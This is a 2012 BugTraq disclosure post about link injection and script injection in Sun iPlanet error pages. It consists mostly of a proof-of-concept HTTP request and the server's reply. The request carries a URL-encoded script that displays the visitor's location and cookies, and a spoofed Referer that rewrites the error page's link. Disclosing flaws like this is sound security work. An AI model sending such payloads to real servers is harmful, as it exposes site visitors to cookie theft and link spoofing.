BugTraq
Sun iPlanet Error Page Link Injection Jun 30 2012 10:11PM
BugsNotHugs (bugsnothugs gmail com)

Sun iPlanet Error Page Link Injection

known about long time, but no CVE! probably because this really lame
vulnerability! some security pro will say this good for social
engineering and give cyberwar example!

GET
/%27%29%3b%61%6c%65%72%74%28%27%58%53%53%5c%72%5c%72%27%2b%27%4c%6f%63%6
1%74%69%6f%6e%3a%20%27%2b%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6
f%6e%2b%27%5c%72%43%6f%6f%6b%69%65%3a%20%27%2b%64%6f%63%75%6d%65%6e%74%2
e%63%6f%6f%6b%69%65%29%3b%2f%2f%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3
d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3
d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, */*
Referer: http://exploit-db.com/
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
1.1.4321; InfoPath.2; .NET CLR 2.0.50737)
Host: target.server
Cache-Control: no-cache
Cookie: ARPT=MyCoOkIe
Connection: close

<HEAD><META HTTP-EQUIV="Content-Type"
CONTENT="text/html;charset=ISO-8859-1"><TITLE>Not Found</TITLE></HEAD>
<H1>Not Found</H1> The requested object does not exist on this server.
The link you followed is either outdated, inaccurate, or the server has
been instructed not to let you have it. Please inform the site
administrator of the <A HREF="https://exploit-db/">referring page</A>.

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus